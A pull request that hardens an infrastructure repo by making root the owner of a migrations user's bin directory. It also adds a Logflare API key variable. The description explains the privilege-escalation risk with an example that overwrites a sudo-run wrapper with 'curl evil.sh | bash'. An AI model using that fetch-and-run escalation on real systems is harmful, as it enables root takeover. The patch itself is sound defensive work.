### PR TITLE
fix: harden migrations user permissions

### DIFF
--- a/infra/ansible/roles/migrations_user/tasks/main.yml
+++ b/infra/ansible/roles/migrations_user/tasks/main.yml
@@ -9,8 +9,8 @@
   ansible.builtin.file:
     path: /home/migrations/bin
     state: directory
-    owner: migrations
-    group: migrations
+    owner: root
+    group: root
     mode: "0755"
 
 - name: Deploy docker-inspect-db-ip wrapper

--- a/infra/supabase/docker-compose.yml
+++ b/infra/supabase/docker-compose.yml
@@ -484,6 +484,7 @@ services:
       retries: 3
     environment:
       LOGFLARE_PUBLIC_ACCESS_TOKEN: ${LOGFLARE_PUBLIC_ACCESS_TOKEN}
+      LOGFLARE_API_KEY: ${LOGFLARE_PUBLIC_ACCESS_TOKEN}
     command: ["--config", "/etc/vector/vector.yml"]
     security_opt:
       - "label=disable"


### PR DESCRIPTION
This is actually the way it is on prod right now. Making the owner and group migrations here was an oversight when writing the ansible scripts. 

Explainer:
On Unix, the right to delete or replace a file depends on write permission of the containing directory, not the file's own ownership. So if migrations owns `/home/migrations/bin` in mode 0755, the owner has write permits. 

That means the migrations user could get root privileges by doing something like:
```
 rm ~/bin/docker-restart-auth
 echo 'curl evil.sh | bash' > ~/bin/docker-restart-auth
 sudo ~/bin/docker-restart-auth
```

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Refined system-level directory permissions configuration for enhanced security and operational stability.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->